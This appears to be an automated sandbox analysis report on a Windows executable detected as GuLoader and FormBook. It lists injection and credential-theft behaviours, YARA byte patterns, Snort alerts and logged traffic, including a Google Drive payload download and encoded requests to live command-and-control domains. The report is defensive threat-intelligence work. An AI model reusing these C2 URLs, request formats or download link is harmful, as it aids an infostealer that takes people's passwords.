Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cuenta para pago1.exe

Overview

General Information

Sample name:cuenta para pago1.exe
Analysis ID:1410998
MD5:93d1942c204022e792af256d0ccbe8e5
SHA1:76649fb41dc760d4c9ad8be23e239fcb7b0e2418
SHA256:c44904bfb8b44d8071f33359f824028597145f76bd1a6baf86d91679215e3c7d
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cuenta para pago1.exe (PID: 8380 cmdline: C:\Users\user\Desktop\cuenta para pago1.exe MD5: 93D1942C204022E792AF256D0CCBE8E5)
    • cuenta para pago1.exe (PID: 8924 cmdline: C:\Users\user\Desktop\cuenta para pago1.exe MD5: 93D1942C204022E792AF256D0CCBE8E5)
      • YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe (PID: 7188 cmdline: "C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 9124 cmdline: C:\Windows\SysWOW64\rasautou.exe MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe (PID: 6944 cmdline: "C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7172 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:03/18/24-15:09:57.009167
        SID:2855465
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:16.037503
        SID:2855464
        Source Port:49821
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:48.984802
        SID:2855464
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:24.436082
        SID:2855465
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:35.249447
        SID:2855465
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:34.275185
        SID:2855464
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:42.848280
        SID:2855465
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:10.841501
        SID:2855465
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:01.994524
        SID:2855464
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:16.329777
        SID:2855464
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:02.687062
        SID:2855464
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:59.288155
        SID:2855464
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:07.414070
        SID:2855465
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:56.860553
        SID:2855465
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:48.749151
        SID:2855464
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:14:44.917245
        SID:2855464
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:43.418492
        SID:2855465
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:35.300715
        SID:2855464
        Source Port:49824
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:45.740181
        SID:2855464
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:51.666556
        SID:2855464
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:51.453597
        SID:2855464
        Source Port:49845
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:21.447672
        SID:2855465
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:53.774164
        SID:2855465
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:05.405243
        SID:2855464
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:37.130935
        SID:2855464
        Source Port:49841
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:48.415608
        SID:2855464
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:38.013422
        SID:2855464
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:13.346460
        SID:2855464
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:19.031210
        SID:2855464
        Source Port:49837
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: cuenta para pago1.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://www.dreadbed.com/v3ka/Avira URL Cloud: Label: malware
        Source: http://www.mvmusicfactory.org/v3ka/Avira URL Cloud: Label: malware
        Source: http://www.stellerechoes.xyz/v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPINAvira URL Cloud: Label: malware
        Source: http://www.stellerechoes.xyz/v3ka/Avira URL Cloud: Label: malware
        Source: http://www.mvmusicfactory.org/v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPINAvira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: cuenta para pago1.exeReversingLabs: Detection: 47%
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: cuenta para pago1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49803 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.30:49804 version: TLS 1.2
        Source: cuenta para pago1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: cuenta para pago1.exe, cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: rasautou.pdbGCTL source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rasautou.pdb source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49810 -> 172.67.130.3:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49811 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49812 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49815 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49816 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49817 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49819 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49820 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49821 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49823 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49824 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49825 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49827 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49828 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49829 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49831 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49832 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49833 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49835 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49836 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49837 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49839 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49840 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49841 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49843 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49844 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49845 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49847 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49852 -> 172.67.130.3:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.stellerechoes.xyz
        Source: Joe Sandbox ViewIP Address: 194.191.24.38 194.191.24.38
        Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
        Source: Joe Sandbox ViewASN Name: GREENgreenchAGAutonomousSystemEU GREENgreenchAGAutonomousSystemEU
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: Joe Sandbox ViewASN Name: HIITL-AS-APHongKongFireLineNetworkLTDHK HIITL-AS-APHongKongFireLineNetworkLTDHK
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.wbyzm5.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.xiefly.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=6uRTEcONOSwyaRtl3SIdI/7ZcaxdnFD0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m5F90vo+8IbH2nL0hLQ=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.dreadbed.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.stellerechoes.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.b-r-consulting.chConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.teenpattimasterapp.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.clarycyber.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.mvmusicfactory.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.kmyangjia.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.globalworld-travel.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /v3ka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.xiefly.shopOrigin: http://www.xiefly.shopContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: max-age=0Referer: http://www.xiefly.shop/v3ka/User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 63 34 71 78 37 4a 49 50 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 49 51 58 6d 68 43 75 47 38 6b 50 38 37 77 53 78 72 47 35 51 6a 62 53 61 52 6e 35 38 37 45 31 58 50 4d 63 6b 61 6e 37 4d 46 4f 62 73 33 48 56 73 50 62 75 52 6f 69 31 66 47 58 58 68 46 4b 55 33 39 54 71 47 50 75 32 50 72 36 4b 59 46 30 54 63 69 4b 45 30 31 70 54 79 68 2f 47 6a 6a 53 56 64 6e 74 6c 51 50 47 65 65 67 63 52 46 73 51 4a 4b 49 56 70 49 53 5a 48 2f 41 70 52 4e 6e 66 53 6d 64 54 34 68 43 73 6f 63 75 44 49 77 43 62 56 5a 31 67 49 4c 71 44 2f 59 53 71 43 5a 7a 7a 4f 56 73 69 77 63 78 37 69 72 30 67 31 41 30 4e 56 62 42 48 2b 4d 56 41 3d 3d Data Ascii: 